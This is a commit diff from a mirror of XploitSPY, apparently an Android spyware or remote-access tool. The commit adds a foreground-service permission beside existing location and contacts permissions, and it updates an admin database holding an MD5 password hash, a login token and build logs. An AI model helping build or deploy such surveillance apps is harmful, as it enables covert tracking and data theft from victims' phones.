mirror of
https://github.com/XploitWizer-Community/XploitSPY.git
synced 2025-01-24 21:52:01 +08:00
Added perm
This commit is contained in:
parent
09a4d9c866
commit
074adc3698
@ -16,6 +16,7 @@
|
|||||||
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
|
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
|
||||||
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
|
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
|
||||||
<uses-permission android:name="android.permission.READ_CONTACTS"/>
|
<uses-permission android:name="android.permission.READ_CONTACTS"/>
|
||||||
|
<uses-permission android:name="android.permission.FOREGROUND_SERVICE" />
|
||||||
<application android:allowBackup="true" android:appComponentFactory="android.support.v4.app.CoreComponentFactory" android:hardwareAccelerated="false" android:icon="@mipmap/ic_launcher" android:label="@string/app_name" android:largeHeap="true" android:supportsRtl="true" android:theme="@style/AppTheme">
|
<application android:allowBackup="true" android:appComponentFactory="android.support.v4.app.CoreComponentFactory" android:hardwareAccelerated="false" android:icon="@mipmap/ic_launcher" android:label="@string/app_name" android:largeHeap="true" android:supportsRtl="true" android:theme="@style/AppTheme">
|
||||||
<activity android:launchMode="singleInstance" android:name="com.remote.app.MainActivity">
|
<activity android:launchMode="singleInstance" android:name="com.remote.app.MainActivity">
|
||||||
<intent-filter>
|
<intent-filter>
|
||||||
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
12
maindb.json
12
maindb.json
@ -2,7 +2,7 @@
|
|||||||
"admin": {
|
"admin": {
|
||||||
"username": "admin",
|
"username": "admin",
|
||||||
"password": "5f4dcc3b5aa765d61d8327deb882cf99",
|
"password": "5f4dcc3b5aa765d61d8327deb882cf99",
|
||||||
"loginToken": "339001007293b333ed5d15da95abf69d",
|
"loginToken": "385d9cb00bf3077b2d035da7f3fa946a",
|
||||||
"logs": [
|
"logs": [
|
||||||
{
|
{
|
||||||
"time": "2020-01-11T15:23:07.971Z",
|
"time": "2020-01-11T15:23:07.971Z",
|
||||||
@ -28,6 +28,16 @@
|
|||||||
"time": "2020-03-22T16:53:31.032Z",
|
"time": "2020-03-22T16:53:31.032Z",
|
||||||
"type": "SUCCESS",
|
"type": "SUCCESS",
|
||||||
"message": "Build Succeded!"
|
"message": "Build Succeded!"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"time": "2020-03-22T18:01:07.951Z",
|
||||||
|
"type": "SUCCESS",
|
||||||
|
"message": "Build Succeded!"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"time": "2020-03-22T18:02:03.352Z",
|
||||||
|
"type": "SUCCESS",
|
||||||
|
"message": "Build Succeded!"
|
||||||
}
|
}
|
||||||
],
|
],
|
||||||
"ipLog": []
|
"ipLog": []
|
||||||
|
Loading…
x
Reference in New Issue
Block a user